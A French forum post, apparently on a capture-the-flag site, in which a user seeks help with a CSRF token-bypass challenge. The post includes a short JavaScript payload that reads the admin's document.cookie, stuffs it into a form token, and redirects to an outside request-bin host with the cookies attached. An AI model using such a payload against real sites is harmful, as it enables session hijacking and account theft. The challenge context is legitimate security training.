Web - Client

mercredi 16 septembre 2020, 22:58  #1
Web - Client CSRF contournement de jeton
lamenoire
lamenoire
  • 2 posts

Bonjour à tous !!

je viens vers vous car j’ai un petit soucis pour ce challenge :

je vous mets mon code avant de commencer :

<script>
test = document.cookie;
document.getElementById('token').setAttribute('value',test);
document.csrf.submit();
document.location.href = ('https://enczlevyib1df.x.pipedream.net/?cookies =' + test);
</script>

comme vous le voyez j’essaie de récuperer le cookie de l’admin dans ma variable test pour après l’envoyer en value dans l’item token. Cela marche avec des valeures fixes sur des page html chez moi mais pas quand je l’upload sur le site.
Pouvez vous juste me dire si je suis sur la bonne voie pour le cookie (et m’aiguiller un peu ^^) ou si je doit chercher une méthode de récupération totalement différente ?

Merci d’avoir pris le temps de me lire :)

Ps : je ne sais si je suis dans le bon sens mais dans le doute je ne mets pas tout le code mais je peux le montrer en mp ^^

Nouvelle réponse Nouvelle réponse   Nouveau sujet Nouveau sujet